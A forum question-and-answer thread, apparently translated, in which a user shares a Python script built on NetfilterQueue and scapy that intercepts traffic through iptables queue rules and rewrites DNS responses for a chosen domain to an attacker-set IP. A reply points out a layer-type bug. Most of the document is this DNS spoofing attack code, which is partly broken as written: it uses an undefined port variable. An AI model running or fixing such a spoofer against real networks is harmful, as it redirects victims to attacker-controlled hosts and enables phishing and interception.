How to implement python packet capture?

L

link_vrb2022-01-20 21:51:26

Python

link_vrb, 2022-01-20 21:51:26

I have code:

from netfilterqueue import NetfilterQueue
from scapy.all import *
from subprocess import call
call('sudo iptables -I OUTPUT -j NFQUEUE --queue-num 1', shell=True)
call('sudo iptables -I INPUT -j NFQUEUE --queue-num 1', shell=True)
def process_packet(packet):
    scapy_packet = IP(packet.get_payload())
    if scapy_packet.haslayer(DNSRR):
        qname = scapy_packet[DNSQR].qname
        stq=str(qname)
        if "мойдомен" in stq:
            print("[+] Spoofing target...")
            answer = DNSRR(rrname = qname, rdata = "myip")
            scapy_packet[DNS].an = answer
            scapy_packet[DNS].ancount = 1
            scapy_packet.dport=port
            try:
                del scapy_packet[IP].len
                del scapy_packet[IP].chksum
            except:
                pass
            try:
                del scapy_packet[UDP].chksum
                del scapy_packet[UDP].len
            except:
                pass
            packet.set_payload(bytes(scapy_packet))
    packet.accept()


qu = NetfilterQueue()
qu.bind(1, process_packet)
try:
    qu.run()
except KeyboardInterrupt:
    call('iptables --flush', shell=True)

When you run it and go to the site 'mydomain', the program does not change the ip 'mydomain' to ip 'myip' , although it should and displays the page 'mydomain'.

Reply

Answer the question

In order to leave comments, you need to log in

1 answer(s)

V

Vindicar, 2022-01-23
@Vindicar

if scapy_packet.haslayer(DNSRR):
qname = scapy_packet[DNSQR].qname
Are you sure there must be different types of packets (DNSRR and DNSQR) here? They are NOT subclasses of each other, they are both subclasses of InheritOriginDNSStrPacket and thus not interchangeable.